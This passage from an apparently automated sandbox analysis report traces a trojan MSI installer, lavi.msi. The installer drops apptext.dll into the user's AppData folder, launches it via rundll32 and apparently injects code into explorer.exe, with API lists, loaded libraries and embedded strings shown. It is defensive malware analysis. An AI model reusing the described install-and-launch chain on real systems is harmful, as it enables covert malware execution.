            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_00000001800EE604
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_00000001800E5638
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_00000001800E464C
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000000018005A270
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_00000001800F32B4
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_00000001800596E0
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_00000001800036F0
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_00000001800FB318
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000000018000B740
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_00000001800F27A0
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_00000001800F0F9C
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000001A9942C1490
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000001A9942AA100
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000001A994299500
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000001A9942AB4E0
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000001A9942A9120
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000001A9942B4550
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000001A994295D60
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000001A9942A4DB0
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000001A9942A55C0
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000001A9942999D0
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000001A9942BB5E0
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000001A9942B55E0
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000001A9942C0210
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000001A9942B7220
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000001A9942966C0
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000001A9942B82A0
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000001A9942A16A0
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000001A9942A42A0
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000001A9942ABED0
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000001A9942B66E0
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000001A99429A730
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000001A9942C1F40
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000001A9942C2F60
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000001A9942B2BB0
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000001A9942BFBC0
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000001A9942B13A3
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000001A9942ACBE0
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000001A9942C2812
            Source: C:\Windows\explorer.exe | Code function: 11_2_02BE1A8C
            Source: C:\Windows\explorer.exe | Code function: 11_2_02BE1A7C
            Source: C:\Windows\explorer.exe | Code function: 11_2_02BE2164
            Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Roaming\apptext.dll F8E3EEF1FDA5969A7AABCC8FB5CC9F5FE245BBF6CC8E480459977B8E91EAB9BD
            Source: C:\Windows\Installer\MSI2701.tmp | Code function: String function: 004E325F appears 103 times
            Source: C:\Windows\Installer\MSI2701.tmp | Code function: String function: 004E3790 appears 39 times
            Source: C:\Windows\Installer\MSI2701.tmp | Code function: String function: 004E3292 appears 70 times
            Source: lavi.msi | Binary or memory string: OriginalFilenameviewer.exeF vs lavi.msi
            Source: lavi.msi | Binary or memory string: OriginalFilenameAICustAct.dllF vs lavi.msi
            Source: apptext.dll.2.dr | Binary string: \BaseNamedObjects\NODCOMM%08XTo%08XCommPortAlpcNOD_SHEVT_%s%xSession\%u\NOD_SHMEM_%s%x\\\Device\\\.\MountPointManager\Device\LanmanRedirector\;%c:SystemRootMup\LanmanRedirector\NwRdr\NetWareRedirector\;LanmanRedirector\SystemHarddiskVolume%d%c:HarddiskDmVolumesS-%lu-0x%02hx%02hx%02hx%02hx%02hx%02hx%lu-%lu\NODSTSIBM037IBM437IBM500ASMO-708DOS-720ibm737ibm775ibm850ibm852IBM855ibm857IBM00858IBM860ibm861DOS-862IBM862IBM863IBM864IBM865cp866IBM866ibm869IBM870windows-874TIS-620cp875shift_jisshift-jisgb2312gb_2312-80gbkwindows-936ks_c_5601-1987EUC-KRbig5x-x-big5IBM1026IBM01047IBM01140IBM01141IBM01142IBM01143IBM01144IBM01145IBM01146IBM01147IBM01148IBM01149utf-16unicodeFFFEwindows-1250windows-1251windows-1252windows-1253windows-1254windows-1255windows-1256windows-1257windows-1258Johabmacintoshx-mac-japanesex-mac-chinesetradx-mac-koreanx-mac-arabicx-mac-hebrewx-mac-greekx-mac-cyrillicx-mac-chinesesimpx-mac-romanianx-mac-ukrainianx-mac-thaix-mac-cex-mac-icelandicx-mac-turkishx-mac-croatianutf-32utf-32BEx-Chinese_CNSx-cp20001x_Chinese-Etenx-cp20003x-cp20004x-cp20005x-IA5x-IA5-Germanx-IA5-Swedishx-IA5-Norwegianus-asciix-cp20261x-cp20269IBM273IBM277IBM278IBM280IBM284IBM285IBM290IBM297IBM420IBM423IBM424x-EBCDIC-KoreanExtendedIBM-Thaikoi8-rIBM871IBM880IBM905IBM00924EUC-JPx-cp20936x-cp20949cp1025koi8-uiso-8859-1iso-8859-2iso-8859-3iso-8859-4iso-8859-5iso-8859-6iso-8859-7iso-8859-8iso-8859-9iso-8859-13iso-8859-15x-Europaiso-8859-8-iiso-2022-jpcsISO2022JPiso-2022-krx-cp50227euc-jpEUC-CNeuc-krhz-gb-2312GB18030x-iscii-dex-iscii-bex-iscii-tax-iscii-tex-iscii-asx-iscii-orx-iscii-kax-iscii-max-iscii-gux-iscii-pautf-7utf-8%
            Source: classification engine | Classification label: mal100.troj.evad.winMSI@9/24@3/2
            Source: C:\Windows\Installer\MSI2701.tmp | Code function: 4_2_004C3860 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,OpenProcess,CloseHandle,Process32NextW,CloseHandle
            Source: C:\Windows\Installer\MSI2701.tmp | Code function: 4_2_004C4BA0 CoInitialize,CoCreateInstance,VariantInit,VariantClear,IUnknown_QueryService,IUnknown_QueryInterface_Proxy,IUnknown_QueryInterface_Proxy,CoAllowSetForegroundWindow,SysAllocString,SysAllocString,SysAllocString,SysAllocString,VariantInit,OpenProcess,WaitForSingleObject,GetExitCodeProcess,CloseHandle,LocalFree,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,SysFreeString,VariantClear,CoUninitialize,_com_issue_error
            Source: C:\Windows\Installer\MSI2701.tmp | Code function: 4_2_004C45B0 LoadResource,LockResource,SizeofResource
            Source: C:\Windows\System32\msiexec.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\CML266F.tmp
            Source: C:\Windows\System32\rundll32.exe | Mutant created: NULL
            Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\TEMP\~DFECD923E3C25B1323.TMP
            Source: C:\Windows\Installer\MSI2701.tmp | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\apptext.dll, Object
            Source: rundll32.exe, 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmp, apptext.dll.2.dr | Binary or memory string: UPDATE MsgPrefix SET JustCreatedFlag = 0 WHERE MsgPrefixID = ?;
            Source: rundll32.exe, 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmp, apptext.dll.2.dr | Binary or memory string: INSERT INTO CacheDbInfo(DbVersion, UsingAdditionalSemiUniqueID, LastMaintenanceTimestamp) VALUES(?, ?, ?);
            Source: rundll32.exe, 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmp, apptext.dll.2.dr | Binary or memory string: CREATE TABLE MsgCache(MsgRowid INTEGER PRIMARY KEY, MsgPrefixID INTEGER, MsgID BLOB NOT NULL, LastUsedTimestamp INTEGER, RecordFlags INTEGER, AVData BLOB, ASData BLOB);
            Source: rundll32.exe, 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmp, apptext.dll.2.dr | Binary or memory string: SELECT MsgRowid, AVData, ASData, LastUsedTimestamp, RecordFlags FROM MsgCache WHERE MsgID = ? AND MsgPrefixID = ?;
            Source: rundll32.exe, 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmp, apptext.dll.2.dr | Binary or memory string: SELECT MsgRowid, AVData, ASData, LastUsedTimestamp, RecordFlags, AdditionalSemiUniqueID FROM MsgCache WHERE MsgID = ? AND MsgPrefixID = ?;
            Source: rundll32.exe, 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmp, apptext.dll.2.dr | Binary or memory string: INSERT INTO TempDb.MsgPrefixRowsToDelete SELECT MsgPrefixID FROM MsgPrefix WHERE MsgPrefixID NOT IN (SELECT DISTINCT MsgPrefixID FROM MsgCache) AND (JustCreatedFlag = 0 OR JustCreatedFlag < ? OR JustCreatedFlag > ?);
            Source: rundll32.exe, 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmp, apptext.dll.2.dr | Binary or memory string: CREATE TABLE MsgPrefix(MsgPrefixID INTEGER PRIMARY KEY, MsgPrefixData BLOB NOT NULL, JustCreatedFlag INTEGER);
            Source: rundll32.exe, 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmp, apptext.dll.2.dr | Binary or memory string: CREATE TABLE TempDb.MsgPrefixRowsToDelete(MsgPrefixID INTEGER PRIMARY KEY);
            Source: rundll32.exe, 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmp, apptext.dll.2.dr | Binary or memory string: CREATE TABLE MsgCache(MsgRowid INTEGER PRIMARY KEY, MsgPrefixID INTEGER, MsgID BLOB, LastUsedTimestamp INTEGER, RecordFlags INTEGER, AVData BLOB, ASData BLOB, AdditionalSemiUniqueID BLOB NOT NULL);
            Source: rundll32.exe, 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmp, apptext.dll.2.dr | Binary or memory string: CREATE TABLE CacheDbInfo(DbVersion INTEGER, UsingAdditionalSemiUniqueID INTEGER, LastMaintenanceTimestamp INTEGER);
            Source: rundll32.exe, 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmp, apptext.dll.2.dr | Binary or memory string: SELECT DbVersion, UsingAdditionalSemiUniqueID, LastMaintenanceTimestamp FROM CacheDbInfo LIMIT 1;
            Source: rundll32.exe, 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmp, apptext.dll.2.dr | Binary or memory string: INSERT INTO TempDb.MsgCacheRowsToDelete SELECT MsgRowid FROM MsgCache WHERE LastUsedTimestamp < ? OR LastUsedTimestamp > ? OR MsgPrefixID NOT IN (SELECT MsgPrefixID FROM MsgPrefix);
            Source: rundll32.exe, 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmp, apptext.dll.2.dr | Binary or memory string: SELECT MsgPrefixID FROM MsgPrefix WHERE MsgPrefixData = ? LIMIT 1;
            Source: rundll32.exe, 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmp, apptext.dll.2.dr | Binary or memory string: SELECT MsgRowid, AVData, ASData, LastUsedTimestamp, RecordFlags, AdditionalSemiUniqueID FROM MsgCache WHERE MsgRowid = ?;
            Source: rundll32.exe, 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmp, apptext.dll.2.dr | Binary or memory string: CREATE TABLE TempDb.MsgCacheRowsToDelete(MsgRowid INTEGER PRIMARY KEY);
            Source: rundll32.exe, 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmp, apptext.dll.2.dr | Binary or memory string: INSERT INTO MsgPrefix(MsgPrefixData, JustCreatedFlag) VALUES (?, ?);
            Source: unknown | Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\lavi.msi"
            Source: unknown | Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
            Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 43BC20CBC49545F265F1331995ABDA6D
            Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\Installer\MSI2701.tmp "C:\Windows\Installer\MSI2701.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\apptext.dll, Object
            Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\apptext.dll, Object
            Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\apptext.dll, Object
            Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 43BC20CBC49545F265F1331995ABDA6D
            Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\Installer\MSI2701.tmp "C:\Windows\Installer\MSI2701.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\apptext.dll, Object
            Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\apptext.dll, Object
            Source: C:\Windows\System32\msiexec.exe | Section loaded: apphelp.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: aclayers.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: sfc.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: sfc_os.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: msi.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: srpapi.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: tsappcmp.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: textinputframework.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: coreuicomponents.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: coremessaging.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: coremessaging.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: wintypes.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: wintypes.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: wintypes.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: propsys.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: textshaping.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: netapi32.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: wkscli.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: netutils.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: version.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: mscoree.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: pcacli.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: mpr.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: apphelp.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: aclayers.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: sfc.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: sfc_os.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: msi.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: tsappcmp.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: netapi32.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: wkscli.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: netutils.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: srclient.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: spp.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: powrprof.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: vssapi.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: vsstrace.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: umpdc.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: mscoree.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: version.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: rstrtmgr.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: ncrypt.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: ntasn1.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: pcacli.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: mpr.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\System32\msiexec.exe | Section loaded: cabinet.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: aclayers.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mpr.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc_os.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msi.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: samcli.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: logoncli.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: samcli.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: logoncli.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: samcli.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: logoncli.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: samcli.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: logoncli.dll
            Source: C:\Windows\Installer\MSI2701.tmp | Section loaded: kernel.appcore.dll
            Source: C:\Windows\Installer\MSI2701.tmp | Section loaded: uxtheme.dll
            Source: C:\Windows\Installer\MSI2701.tmp | Section loaded: sxs.dll
            Source: C:\Windows\Installer\MSI2701.tmp | Section loaded: onecorecommonproxystub.dll
            Source: C:\Windows\Installer\MSI2701.tmp | Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\explorer.exe | Section loaded: netapi32.dll
            Source: C:\Windows\explorer.exe | Section loaded: dsrole.dll
            Source: C:\Windows\explorer.exe | Section loaded: windows.cloudstore.schema.shell.dll
            Source: C:\Windows\explorer.exe | Section loaded: windows.internal.shell.broker.dll
            Source: C:\Windows\Installer\MSI2701.tmp | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32
            Source: lavi.msi | Static file information: File size 2131456 > 1048576
            Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSI2701.tmp, 00000004.00000000.1441195178.0000000000507000.00000002.00000001.01000000.00000003.sdmp, MSI2701.tmp, 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp, lavi.msi, 5d243d.msi.2.dr, MSI2635.tmp.2.dr, MSI2701.tmp.2.dr
            Source: Binary string: eplgOutlook.pdb source: rundll32.exe, 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmp, apptext.dll.2.dr
            Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: lavi.msi, MSI2586.tmp.2.dr, MSI25D6.tmp.2.dr, 5d243d.msi.2.dr, MSI2527.tmp.2.dr, MSI25B6.tmp.2.dr
            Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: lavi.msi, MSI2586.tmp.2.dr, MSI25D6.tmp.2.dr, 5d243d.msi.2.dr, MSI2527.tmp.2.dr, MSI25B6.tmp.2.dr
            Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSI2701.tmp, 00000004.00000000.1441195178.0000000000507000.00000002.00000001.01000000.00000003.sdmp, MSI2701.tmp, 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp, lavi.msi, 5d243d.msi.2.dr, MSI2635.tmp.2.dr, MSI2701.tmp.2.dr
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_00000001800D2C10 LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
            Source: apptext.dll.2.dr | Static PE information: real checksum: 0x16c5c6 should be: 0x19fb70
            Source: C:\Windows\Installer\MSI2701.tmp | Code function: 4_2_004E323C push ecx; ret 4_2_004E324F
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_00000001800043FA push rbp; retf 6_2_00000001800043FB
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_0000000180004437 push rbp; retf 6_2_0000000180004438
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000000018000430A push rbp; retf 6_2_000000018000430B
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_0000000180004326 push rbp; retf 6_2_0000000180004327
            Source: C:\Windows\explorer.exe | Code function: 11_2_02BF02B8 push rsi; retf 11_2_02BF02BB
            Source: C:\Windows\explorer.exe | Code function: 11_2_02BF04B8 push rsi; retf 11_2_02BF04C3
            Source: C:\Windows\explorer.exe | Code function: 11_2_02BF02B0 push rbp; retf 11_2_02BF02AB
            Source: C:\Windows\explorer.exe | Code function: 11_2_02BF02B0 push rbp; retf 11_2_02BF02B3
            Source: C:\Windows\explorer.exe | Code function: 11_2_02BF02A8 push rbp; retf 11_2_02BF02AB
            Source: C:\Windows\explorer.exe | Code function: 11_2_02BF02E0 push r14; retf 11_2_02BF02EB
            Source: C:\Windows\explorer.exe | Code function: 11_2_02BF04E0 push rsi; retf 11_2_02BF04E3
            Source: C:\Windows\explorer.exe | Code function: 11_2_02BF04D0 push rsi; retf 11_2_02BF04D3
            Source: C:\Windows\explorer.exe | Code function: 11_2_02BEE6CA push rcx; ret 11_2_02BEE6CB
            Source: C:\Windows\explorer.exe | Code function: 11_2_02BF04C8 push rsi; retf 11_2_02BF04DB
            Source: C:\Windows\explorer.exe | Code function: 11_2_02BF04C0 push rsi; retf 11_2_02BF04C3
            Source: C:\Windows\explorer.exe | Code function: 11_2_02BF0418 push r14; retf 11_2_02BF0423
            Source: C:\Windows\explorer.exe | Code function: 11_2_02BF0410 push rbp; retf 11_2_02BF0413
            Source: C:\Windows\explorer.exe | Code function: 11_2_02BF0250 push rsi; retf 11_2_02BF0253
            Source: C:\Windows\explorer.exe | Code function: 11_2_02BF0248 push rsi; retf 11_2_02BF024B
            Source: C:\Windows\explorer.exe | Code function: 11_2_02BF0248 push rbp; retf 11_2_02BF0293
            Source: C:\Windows\explorer.exe | Code function: 11_2_02BEF197 push rsi; retf 11_2_02BEF198
            Source: C:\Windows\explorer.exe | Code function: 11_2_02BF0388 push rbp; retf 11_2_02BF039B
            Source: C:\Windows\explorer.exe | Code function: 11_2_02BF0380 push rbp; retf 11_2_02BF039B
            Source: C:\Windows\explorer.exe | Code function: 11_2_02BF01E0 push rbp; retf 11_2_02BF0223
            Source: C:\Windows\explorer.exe | Code function: 11_2_02BF03C8 push rsi; retf 11_2_02BF03BB
            Source: C:\Windows\explorer.exe | Code function: 11_2_02BF03C8 push rbp; retf 11_2_02BF03EB
            Source: C:\Windows\explorer.exe | Code function: 11_2_02BEE537 push rbp; iretd 11_2_02BEE538
            Source: C:\Windows\explorer.exe | Code function: 11_2_02BF0130 push 00000072h; retf 11_2_02BF011B
            Source: C:\Windows\explorer.exe | Code function: 11_2_02BF0330 push rbp; retf 11_2_02BF0333
            Source: C:\Windows\explorer.exe | Code function: 11_2_02BF0320 push rsi; retf 11_2_02BF0323

            Persistence and Installation Behavior

            Source: C:\Windows\System32\msiexec.exe | Executable created and started: C:\Windows\Installer\MSI2701.tmp
            Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI25B6.tmp
            Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI2586.tmp
            Source: C:\Windows\System32\msiexec.exe | File created: C:\Users\user\AppData\Roaming\apptext.dll
            Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI2527.tmp
            Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI25D6.tmp
            Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI2701.tmp
            Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI25B6.tmp
            Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI2586.tmp
            Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI2527.tmp
            Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI25D6.tmp
            Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI2701.tmp
            Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
